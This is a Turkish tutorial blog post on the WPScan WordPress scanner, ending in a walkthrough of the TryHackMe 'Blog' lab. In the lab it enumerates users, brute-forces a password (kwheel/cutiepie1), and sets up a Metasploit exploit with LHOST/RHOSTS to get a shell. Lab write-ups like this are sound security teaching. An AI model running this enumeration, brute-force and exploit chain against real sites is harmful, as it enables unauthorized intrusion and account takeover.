Wpscan

Wpscan açık kaynak kodlu geliştirilmiş ve terminalde çalıştırılan bir araçtır. WordPress kullanan sitelerde tarama yapmak için kullanılır.
WordPress siteleri hakkında temel bilgileri ve varsa güvenlik zafiyetleri hakkında bilgi verir. Kali Lİnux üzerinde yüklü olarak gelir.
Biraz Wpscan aracının yapabildiklerinden bahsedelim:
Tema taraması
Eklenti taraması
Brute Force
Dizin taraması vb.
Eğer başka bir dağıtım kullanıyorsanız aşşağıdaki kod ile Wpscan aracınızı indirebilirsiniz.
gem install wpscan
Aracımızın sahip olduğu parametreleri görmek için şu komutu kullanıyoruz:
wpscan -h

Bir web sitesi üzerinde tarama gerçekleştireceğimiz için bir url parametresine ihtiyacımız var. --url
parametresiyle test edeceğimiz web sitesini parametre olarak veriyoruz.
Ayrıca aracın hangi türde bir tarama yapacağından bahsetmemiz lazım bunun içinde --enumerate
parametresini kullanıyoruz.
--enumerate parametresiyle seçenekler vermemiz lazım:
t : Popüler temaları tarar
vt : Zafiyetli temaları tarar
p : Popüler eklentileri tarar
vp : Zafiyetli eklentileri tarar
ap : Bütün eklentileri tarar
Verilen --url parametresine göre popüler temaları tarar:
wpscan --url <ip/url> --enumerate t
-vt parametresiyle zafiyetli temaları tarar:
wpscan --url <ip/url> --enumerate vt
-p parametresiyle popüler eklentileri tarar:
wpscan --url <ip/url> --enumerate p
-vp parametresiyle zafiyetli eklentileri tarar:
wpscan --url <ip/url> --enumerate vp
-at parametresiyle bütün temalarda arama yapar:
wpscan --url <ip/url> --enumerate at
-ap parametresiyle bütün temalarda arama yapar:
wpscan --url <ip/url> --enumerate ap
Wpscan aracımızı daha iyi tanımak ve kullanabilmek için Try Hack Me Blog odasında kullanacağım. Öncelikle web sitemizi çalıştırıyoruz. Öncelikle Try Hack Me tarafından bana verilen Ip adresini /etc/hosts altındaki dosyaya ekliyorum.

Sonrasında tarayıcımdan blog.thm adresine gidiyorum. Ve sitede gezinirken en alt tarafta sitenin WordPress ile geliştirildiğine dair bir yazı yer alıyor.

Wpscan aracımız ile site üzerinde tarama yapabiliriz. Öncelikle zafiyetli eklentiler için bir tarama yapalım bunun için şu komutu yazıyoruz:
wpscan --url blog.thm --enumerate vp
Bu sorgunun sonucu olarak yararlı bir şey çıkmıyor. Var olan kullanıcıları listeleyeim ve sonrasında brute force deneyelim.
wpscan --url blog.thm --enumerate u
Bu işlemden sonra karşımıza şöyle bir sonuç çıkıyor.

2 tane kullanıcımız var Karen Wheeler ve Bill Joel. Bunların kullanıcı adları sırasıyla kwhell ve bjoel. Kullanıcı adlarını bulduğumuza göre login ekranına brute force deneyelim. Öncelikle kwhell kullanıcısı için bir komut yazacağım. Eğer şifreyi bulamazsak bjoel kullanıcısı içinde bir komut yazacağım.
wpscan --url blog.thm --usernames kwheel --passwords <sifre.txt>
Bu işlem sonucunda geçerli bir şifre elde ediyoruz.

kwheel - cutiepie1
bu bilgiler ile giriş yapalım ve bakalım sonrasında neler yapabiliyoruz.

Giriş yaptıktan sonra karşımıza ektra bir şey çıkmıyor. Web sitesi özelinde temel işle yapabiliyoruz. Bizim sunucuda olan dosyalarla işimiz var. WordPress'in eski sürümlerinde zafiyet olabilir ve biz bu zafiyeti kullanabiliriz. Zafiyetleri görmek için yukarıda yaptığımız wpscan --url blog.thm --enumerate vp
komutundan biraz daha farklı bir şey yazacağız. Yukarıdaki gibi bir komut yazarsak Wpscan bize zafiyetleri göstermiyor.
Bize zafiyetleri göstermesini istiyorsak Wpscan adresinden bize sağlanan token değerini parametre olarak vermemiz gerekiyor.
wpscan --url blog.thm --enumerate vp --api-token <token>
Bu kod sonrasında sistemden şöyle bir çıktı almamız sağlar.

Çıktı olarak 70 tane zafiyetin olduğunu gösteriyor. WordPress sürümünü de öğrendikten sonra msfconsole üzerinden zafiyet araması yapabiliriz.

Karşımızı bu sonuçlar çıkıyor. use 0
diyerek payloadımı seçiyorum. Sonrasında payloadın bize sunduğu ayarları görmek için show options
diyorum.

Sırasıyla şu ayarlamaları yapıyorum.
set PASSWORD cutiepie1
set RHOSTS 10.10.154.220 // THM odasının çalıştığı IP adresini veriyoruz
set USERNAME kwheel
set LHOST 10.6.63.226 // THM odasına bağlandığımız IP adresi
run
Run komutuyla birlikte exploitimiz çalışmaya başlıyor. Buradaki amacımız var olan bir zafiyeti sömürerek shell almaya çalışıyoruz.

Ve evet shell aldık, sistem üzerinde komutlar çalıştırabiliyoruz.
Bu yazı Yavuz Kuk tarafından hazırlanmıştır.
Last updated